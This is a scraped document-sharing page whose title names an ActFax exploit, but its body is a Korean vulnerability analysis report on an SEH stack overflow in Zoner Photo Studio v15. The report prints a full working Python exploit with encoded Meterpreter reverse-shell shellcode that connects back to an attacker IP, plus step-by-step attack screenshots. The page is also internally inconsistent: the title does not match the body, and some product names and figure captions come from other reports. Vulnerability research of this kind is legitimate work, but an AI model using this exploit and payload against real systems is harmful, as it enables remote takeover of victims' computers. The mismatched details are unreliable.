ActFax 4.31 Local Privilege Escalation Exploit

Similar documents
취약점분석보고서 [Photodex ProShow Producer v ] RedAlert Team 안상환

목 차 1. 개요 취약점분석추진배경 취약점요약 취약점정보 취약점대상시스템목록 분석 공격기법및기본개념 시나리오 공격코드

취약점분석보고서 [CyberLink Power2Go name attribute (p2g) Stack Buffer Overflow Exploit] RedAlert Team_ 강동우

취약점분석보고서 [Elecard AVC_HD/MPEG Player 5.7 Buffer Overflow] RedAlert Team 봉용균

취약점분석보고서 Simple Web Server 2.2 rc2 Remote Buffer Overflow Exploit RedAlert Team 안상환

ActFax 4.31 Local Privilege Escalation Exploit

Deok9_Exploit Technique

Red Alert Malware Report

목 차 1. 개 요 배경 요약 정보 대상시스템 원리 공격 기법 및 기본 개념 Heap Spray Font 공 격..

!K_InDesginCS_NFH

1.hwp

Exploit writing tutorials

how_2_write_Exploit_4_the_MSF_v3.x.hwp

Microsoft Word - MSOffice_WPS_analysis.doc

사용 설명서

AVG PC TuneUp User Manual

본문서는 Syngress 의 Writing Security Tools and Exploits Chap11 을요약정리한 것입니다. 참고로 Chap 10 ~ 12 까지가 Metasploit 에대한설명입니다. Metasploit Framework 활용법 1. Metasplo

2004 IRISPen 사용자 설명서-본문-용지크기 조정-폰트포함.PDF

Microsoft Word - SEH_Overwrites_Simplified.doc

PowerPoint Template

API 매뉴얼

토익S-채용사례리플렛0404

Studuino소프트웨어 설치

ActFax 4.31 Local Privilege Escalation Exploit

Android Master Key Vulnerability

chap 5: Trees

Microsoft Word - GOM-StackOverFlow.doc

No

Table Of Contents 1/7 0. Introduction 0-1. Introduction 0-1. Testing Environment 1. Software Vulnerabilty Review 1-1. Buffer OverFlow 1-2. Format Stri

로거 자료실

0x00 Contents 0x About Nickster 0x Analaysis 0x Exploit

Eureka Mail Client_v2.2.q를이용하여오믈렛에그헌팅에대하여알아볼것이다. 익스플로잇을위해구성된환경은아래와같다. - Windows XP Professional SP3 KOR - Python Ollydbg 1.x, Immunity Debugg

Microsoft Word - Heap_Spray.doc

Research & Technique Apache Tomcat RCE 취약점 (CVE ) 취약점개요 지난 4월 15일전세계적으로가장많이사용되는웹애플리케이션서버인 Apache Tomcat에서 RCE 취약점이공개되었다. CVE 취약점은 W

ìœ€íŁ´IP( _0219).xlsx

pdf

³»Áö_1È£_0107L

API 매뉴얼

Poison null byte Excuse the ads! We need some help to keep our site up. List 1 Conditions 2 Exploit plan 2.1 chunksize(p)!= prev_size (next_chunk(p) 3

Observational Determinism for Concurrent Program Security

01 EDITOR S PICK: 068_ _069

Eureka Mail Client_v2.2.q를이용하여에그헌팅에대하여알아볼것이다. 익스플로잇을위해구성된환경은아래와같다. - Windows XP Professional SP3 KOR - Python Ollydbg 1.x, Immunity Debugger

DR-M140 사용 설명서

ÀÎÅÍ³Ý ÁøÈï¿ø 3¿ù ÀúÇØ»ó

KakaoGame Integrated Guidelines _Open

ArcGIS Desktop 9.2 Install Guide

*금안 도비라및목차1~9

** 5 개이발생한주요소프트웨어별취약점세 EDB 번호취약점종류공격난이도공격위험도취약점이름소프트웨어이름

EDB 분석보고서 (04.06) ~ Exploit-DB( 에공개된별로분류한정보입니다. Directory Traversal users-x.php 4.0 -support-x.php 4.0 time-

커알못의 커널 탐방기 이 세상의 모든 커알못을 위해서

Microsoft Word - Exploit writing tutorial part 1.doc

<443A5C4C C4B48555C B3E25C32C7D0B1E25CBCB3B0E8C7C1B7CEC1A7C6AE425CBED0C3E0C7C1B7CEB1D7B7A55C4C656D70656C2D5A69762E637070>

歯박지원-구운몽.PDF

*금안14(10)01-도비라및목차1~12

XSS Attack - Real-World XSS Attacks, Chaining XSS and Other Attacks, Payloads for XSS Attacks

hlogin2

EDB 분석보고서 (04.03) ~ Exploit-DB( 에공개된별로분류한정보입니다. ** 5개이상발생한주요소프트웨어별상세 EDB 번호 종류 공격난이도 공격위험도 이름 소프트웨어이름 3037 SQL Inj

MF3010 MF Driver Installation Guide

*Revision History 날짜 내용 최초작성 Tel Fax [2] page

Computer Security Chapter 08. Format String 김동진 1 Secure Software Lab.

untitled

<41736D6C6F D20B9AEBCADBEE7BDC42E687770>

Basic of Real World Exploit on Windows Author

목차 BUG offline replicator 에서유효하지않은로그를읽을경우비정상종료할수있다... 3 BUG 각 partition 이서로다른 tablespace 를가지고, column type 이 CLOB 이며, 해당 table 을 truncate

4 꼬부랑 이라는 말이 재미있습니다. 5같은 말이 반복이 되어서 지루합니다. 4 꼬부랑 은 굽은 모양을 재미있게 흉내 낸 말입니다. 꼬부랑 을 빼고 읽는 것보다 넣어서 읽 으면 할머니와 엿가락, 강아지의 느낌이 좀 더 실감 나서 재미가 있습니다. 국어2(예습) / 1.

PowerPoint Presentation

1 법적 고지 사항 SK hynix Inc.는 사전 통보 없이 제품, 정보 및 사양을 변경할 권리를 보유합니다. 본 문서의 제품 및 사양은 참조용입니다. 본 문서의 모든 정보는 어떠한 형태의 보증 없이 있는 그대로 제공됩니다. 본 문서와 여기 포함된 모든 정보는 SK

Analytics > Log & Crash Search > Unity ios SDK [Deprecated] Log & Crash Unity ios SDK. TOAST SDK. Log & Crash Unity SDK Log & Crash Search. Log & Cras

Heap Overflow By WraithOfGhost

untitled

01.ROP(Return Oriented Programming)-x86 Excuse the ads! We need some help to keep our site up. List Return Oriented Programming(ROP) -x86 Gadgets - PO

기술문서 작성 XXE Attacks 작성자 : 인천대학교 OneScore 김영성 I. 소개 2 II. 본문 2 가. XML external entities 2 나. XXE Attack 3 다. 점검방법 3 라.

manual pdfÃÖÁ¾

목 차 1. 드라이버 설치 설치환경 드라이버 설치 시 주의사항 USB 드라이버 파일 Windows XP에서 설치 Windows Vista / Windows 7에서 설치 Windows

Microsoft Word - Crackme 15 from Simples 문제 풀이_by JohnGang.docx

CX2 Camera User Guide

제목 레이아웃

< 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 9 3. 악성코

Install stm32cubemx and st-link utility

인도 웹해킹 TCP/80 apache_struts2_remote_exec-4(cve ) 인도 웹해킹 TCP/80 apache_struts2_remote_exec-4(cve ) 183.8

Microsoft Word - ANI 취약점.doc

DWCOM15/17_manual

익스플로잇실습 / 튜토리얼 Easy RM to MP3 Converter ROP [ Direct RET VirtualProtect() 함수사용 ] By WraithOfGhost

< FBFF9B0A320BEC7BCBAC4DAB5E520C0BAB4D0BBE7C0CCC6AE20C5BDC1F620B5BFC7E220BAB8B0EDBCAD283131BFF E302028C8A8C6E4C0CCC1F620BEF7B

08년csr3호

Interstage5 SOAP서비스 설정 가이드

*금안 도비라및목차1~17

CyberLink YouCam

Microsoft Word - building the win32 shellcode 01.doc

Black Hole Exploit Kit PDF Exploit $selectedexploit =? 3 or 4 /games/pdf.php /games/pdf2.php CVE , CVE , CVE , CVE

03장.스택.key

<B1DDC0B6C1A4BAB8C8ADC1D6BFE4B5BFC7E C8A3292E687770>


hlogin7

P2WW HNZ0

목차 006/ 008/ 009/ 011/ 012/ 013/ 014/ Part 1_ 컴퓨터가 제대로 작동하지 않을 때 문제00_ 윈도우7 복구(초기화) 방법 안내 문제01_ 컴퓨터의 전원 버튼을 눌러도 아무 반응이 없어요. 문제02_ 전원을 누르면 팬(쿨러)이 돌아가는

Microsoft Word - mar6ocmanual_KO

다른 JSP 페이지호출 forward() 메서드 - 하나의 JSP 페이지실행이끝나고다른 JSP 페이지를호출할때사용한다. 예 ) <% RequestDispatcher dispatcher = request.getrequestdispatcher(" 실행할페이지.jsp");

ISP and CodeVisionAVR C Compiler.hwp

목 차 1. 개요 취약점분석추진배경 CVE 취약점요약 CVE 분석 CVE 취약점개요 CVE 대상시스템목록...

Transcription:

NSHC 2013. 01. 14. 취약점분석보고서 Information Service about a new vulnerability Version 1.0 [ ] 2012 Red Alert. All Rights Reserved.

목차 1. 개요... 3 2. 공격... 4 3. 분석... 8 4. 결론... 12 5. 대응방안... 12 6. 참고자료... 13 facebook.com/nshc.redalert 2012 Red Alert. All Rights Reserved. 1

Confidentiality Agreements 본문서는 Red Alert 팀에서제작한분석보고서로써, RedAlert 팀허가없이배포및공유가가능하나수정은금합니다. 분석보고서는 Red Alert 팀에서운영하는 Facebook 페이지 (https://www.facebook.com/nshc.redalert) 에서확인할수있습니다. Facebook 에등록되는분석보고서를포함한이외의자료들은유료페이지인 isac 페이지 (https://isac.nshc.net) 에서제공받으실수있습니다. facebook.com/nshc.redalert 2012 Red Alert. All Rights Reserved. 2

1. 개요.12 년 11 월 9 일에발표된 Zoner 사의 Photo Studio 에관한취약점분석보고서입니다. 특정레 지스터의값을변조하여 Buffer Overflow 를발생되도록합니다. Photo Studio 는프로그램이처음로드할때오류를저장하는레지스터를참조하며이과정에 서데이터의검증과정을거치지않아발생하는 Stack 기반의 Buffer Overflow 취약점입니다. 취약점이름 Zoner Photo Studio v15 Build 3 (Zps.exe) Registry Value Parsing Exploit 최초발표일 2012년 11월 09일 문서작성일 2013년 1월 14일 Version Build 2, Build 3 상태 패치됨 Vender Zoner Author Julien Ahrens 공격범위 local 공격유형 Stack Buffer Overflow 표 1. 취약점정보 Photo Studio 프로그램자체의취약점으로 Sound Editor Pro 가사용될수있는모든 Window 가대상이됩니다.. Microsoft Windows 2000 Microsoft Windows XP Microsoft Windows 2003 Microsoft Windows Vista Microsoft Windows 7 Microsoft Windows 2008 표 2. 대상시스템 facebook.com/nshc.redalert 2012 Red Alert. All Rights Reserved. 3

2. 공격 가. 공격자의컴퓨터에서 4444 포트를열고대기합니다. 나. 취약한레지스터의값을공격코드가들어있는레지스터값으로교체합니다. 다. 피해자의컴퓨터에서 Photo Studio를실행합니다. 라. 공격자컴퓨터에피해자컴퓨터의 Sehll이뜨는지확인합니다. Photo Studio 는이미지파일을수정하는프로그램입니다.. 그림 1. 대상프로그램 facebook.com/nshc.redalert 2012 Red Alert. All Rights Reserved. 4

가. 공격자컴퓨터에서 4444 포트를열고대기합니다. 그림 2. 공격자컴퓨터에서대기 나. 취약한레지스터의값을공격코드가들어있는레지스터값으로교체합니다. 그림 3. 공격코드레지스터값삽입 facebook.com/nshc.redalert 2012 Red Alert. All Rights Reserved. 5

다. 피해자의컴퓨터에서 Photo Studio 를실행합니다. 그림 4. 공격웹페이지로접근 공격코드로인해프로그램이실행되기전에 Crash 가뜨므로실제로는켜지지않습니다. facebook.com/nshc.redalert 2012 Red Alert. All Rights Reserved. 6

라. 공격자컴퓨터에피해자컴퓨터의 Sehll 이뜨는지확인합니다. 그림 5. 공격성공화면 facebook.com/nshc.redalert 2012 Red Alert. All Rights Reserved. 7

3. 분석 위프로그램을공격하기위해 Stack Buffer Overflow, Seh변조, ROP가사용되었습니다. Buffer Overflow의방법중 Stack Buffer Overflow는정상버퍼크기이상의문자열이입력되었을경우정상버퍼를넘어선다른영역을침범하여 Crash를발생시킬수있으며 Crash로인해 exploit을시도할수있습니다. Window 에서에러를제어하기위한 Seh 를악용하여공격자가심어둔 Shellcode 로이동하여 Shellcode 를실행할수있습니다. #!/usr/bin/python from struct import pack file="poc.reg" junk1="\xcc" * 2136 nseh="\xeb\x06\x90\x90" seh=pack('<l',0x0cfad713) # JMP DWORD PTR SS:[EBP-18] - Access: (PAGE_READWRITE) [SafeSEH Bypass] nops="\x90" * 10 junk2="\xcc" * 1000 # msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.196.134 R msfencode -b '\x00\x0a\x0d\x22\x93' #[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1) Sehllcode = ("\xda\xd7\xbb\x4c\xba\x94\xfc\xd9\x74\x24\xf4\x58\x33\xc9" + "\xb1\x49\x83\xc0\x04\x31\x58\x15\x03\x58\x15\xae\x4f\x68" + "\x14\xa7\xb0\x91\xe5\xd7\x39\x74\xd4\xc5\x5e\xfc\x45\xd9" + "\x15\x50\x66\x92\x78\x41\xfd\xd6\x54\x66\xb6\x5c\x83\x49" + "\x47\x51\x0b\x05\x8b\xf0\xf7\x54\xd8\xd2\xc6\x96\x2d\x13" + "\x0e\xca\xde\x41\xc7\x80\x4d\x75\x6c\xd4\x4d\x74\xa2\x52" + "\xed\x0e\xc7\xa5\x9a\xa4\xc6\xf5\x33\xb3\x81\xed\x38\x9b" + "\x31\x0f\xec\xf8\x0e\x46\x99\xca\xe5\x59\x4b\x03\x05\x68" + "\xb3\xcf\x38\x44\x3e\x0e\x7c\x63\xa1\x65\x76\x97\x5c\x7d" + "\x4d\xe5\xba\x08\x50\x4d\x48\xaa\xb0\x6f\x9d\x2c\x32\x63" + "\x6a\x3b\x1c\x60\x6d\xe8\x16\x9c\xe6\x0f\xf9\x14\xbc\x2b" + "\xdd\x7d\x66\x52\x44\xd8\xc9\x6b\x96\x84\xb6\xc9\xdc\x27" + "\xa2\x6b\xbf\x2f\x07\x41\x40\xb0\x0f\xd2\x33\x82\x90\x48" + "\xdc\xae\x59\x56\x1b\xd0\x73\x2e\xb3\x2f\x7c\x4e\x9d\xeb" + "\x28\x1e\xb5\xda\x50\xf5\x45\xe2\x84\x59\x16\x4c\x77\x19" + "\xc6\x2c\x27\xf1\x0c\xa3\x18\xe1\x2e\x69\x31\x8b\xd5\xfa" + "\xfe\xe3\x12\x7c\x96\xf1\x9a\x90\x3b\x7c\x7c\xf8\xd3\x28" + "\xd6\x95\x4a\x71\xac\x04\x92\xac\xc8\x07\x18\x42\x2c\xc9" + "\xe9\x2f\x3e\xbe\x19\x7a\x1c\x69\x25\x51\x0b\x96\xb3\x5d" + "\x9a\xc1\x2b\x5f\xfb\x26\xf4\xa0\x2e\x3d\x3d\x34\x91\x2a" + "\x42\xd8\x11\xab\x14\xb2\x11\xc3\xc0\xe6\x41\xf6\x0e\x33" + "\xf6\xab\x9a\xbb\xaf\x18\x0c\xd3\x4d\x46\x7a\x7c\xad\xad" + "\x7a\x41\x78\x88\xf8\xb3\x0e\xf8\xc0") facebook.com/nshc.redalert 2012 Red Alert. All Rights Reserved. 8

poc="windows Registry Editor Version 5.00\n\n" poc=poc + "[HKEY_CURRENT_USER\Software\ZONER\Zoner Photo Studio 15\Preferences\Certificate]\n" poc=poc + "\"Issuer\"=\"" + junk1 + nseh + seh + nops + Sehllcode + junk2 + "\"" try: print "[*] Creating exploit file...\n"; writefile = open (file, "w") writefile.write( poc ) writefile.close() print "[*] File successfully created!"; except: print "[!] Error while creating file!"; 표 3. 공격코드 Seh와 Nseh를덮어씌기위한 junk값 2136개를삽입합니다. Nseh에는 jmp 6코드를삽입하여 Seh 다음에있는 Nop으로이동하도록합니다. Seh는예외처리문을넘어가기위한 pop pop ret 주소를삽입합니다. Nop이작동후 Sehllcode로넘어갈것입니다. Photo studio의 Bad char인 \x00\x0a\x0d\x22\x93을뺀공격자컴퓨터로접근하게되는 reverse Shellcode입니다.. poc.reg 가실행되면취약레지스터값으로바로삽입되도록레지스터파일형식을맞춰주며 payload 는 junk 값을채워준후 Nseh, Seh, nops, Sehllcode, junk 값이들어갑니다.. 위값을파일에삽입하는과정이며파일이제대로생성되지않거나입력이이루어지지않을경우오류 문자열을출력하게됩니다.. facebook.com/nshc.redalert 2012 Red Alert. All Rights Reserved. 9

가. Seh 변조 그림 6. Seh 변조 Seh 가 JMP 주소로잘수정된것을볼수있습니다. 나. Nseh 실행 그림 7. Nseh 실행 Nseh 즉, jmp 6 으로인해 NOP 으로넘어갈것입니다. facebook.com/nshc.redalert 2012 Red Alert. All Rights Reserved. 10

다. Nop 실행 그림 8. 디버깅을위한 logcat 실행 Nseh 즉, jmp 6 으로인해 NOP 으로넘어와 NOP 이실행됩니다. 라. Sehllcode 실행 그림 9. Sehllcode 실행 Sehllcode 가작동되며공격자컴퓨터에피해자컴퓨터의제어권이넘어가게됩니다. facebook.com/nshc.redalert 2012 Red Alert. All Rights Reserved. 11

4. 결론 위취약점은 Photo Studio 는프로그램이처음로드할때오류를저장하는레지스터를참조하며 이과정에서데이터의검증과정을거치지않아버퍼이상의레지스터값을삽입하여 Buffer Overflow 를발생시켜공격자가원하는 Sehllcode 를작동되게합니다. 5. 대응방안 위취약점은레지스터값에대한길이를검증하지않아발생하는문제이므로레지스터의값에대 한검증부분을추가하여야될것입니다. facebook.com/nshc.redalert 2012 Red Alert. All Rights Reserved. 12

6. 참고자료 [1] 취약점본문 http://www.exploit-db.com/exploits/22652/ facebook.com/nshc.redalert 2012 Red Alert. All Rights Reserved. 13

2024 © docsplayer.org 개인정보보호 | 약관 | 지원